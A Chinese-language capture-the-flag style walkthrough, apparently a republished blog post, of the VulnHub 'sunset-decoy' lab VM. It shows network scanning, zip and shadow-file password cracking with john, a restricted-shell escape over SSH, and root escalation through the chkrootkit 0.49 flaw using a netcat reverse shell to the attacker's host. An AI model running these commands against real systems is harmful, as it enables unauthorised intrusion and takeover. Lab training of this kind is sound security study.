vulnhub之sunset-decoy的实践
2023-4-16 15:54:46 Author: 云计算和网络安全技术实践(查看原文) 阅读量:10 收藏

今天实践的是vulnhub的sunset-decoy镜像,

下载地址,https://download.vulnhub.com/sunset/decoy.ova,

用virtualbox导入,做地址扫描,

sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

浏览器访问http://192.168.0.190,

下载save.zip,解压发现需要密码,

准备破解密码的hash文件,zip2john save.zip > pass.hash,

破解,john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash,

获取到解压密码,manuel,解压后发现里面有密码hash文件,

破解,john --wordlist=/usr/share/wordlists/rockyou.txt etc/shadow,

获取到用户名296640a3b825115a47b68fc44501c828的密码server,

ssh登录到靶机,

ssh [email protected] -t "bash --noprofile",

查看日志文件,/bin/cat log.txt,

获取到chkrootkit-0.49信息,

查找可利用的漏洞,searchsploit chkrootkit,

进一步查看利用方法,searchsploit -p 33899,

cat /usr/share/exploitdb/exploits/linux/local/33899.txt,

说是让在tmp目录创建个update文件,

进入tmp目录,cd /tmp,写个反弹shell脚本,

echo "/usr/bin/nc 192.168.0.189 4444 -e /bin/sh" > update,

给脚本开执行权限,/bin/chmod 777 update,

kali攻击机上用nc开个反弹shell监听,nc -lvp 4444,

回到用户目录下执行honeypot.decoy,选择第5项,病毒扫描,

稍等一会儿,反弹shell就过来了,id确认是root,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650747587&idx=1&sn=4d47f69e18f5a13c69cf34f3bb550de5&chksm=871493c3b0631ad596b426ab833bb7b14c89d72d463adbf2eac7dff27b4ffc3fab208ab5f2f5#rd
如有侵权请联系:admin#unsafe.sh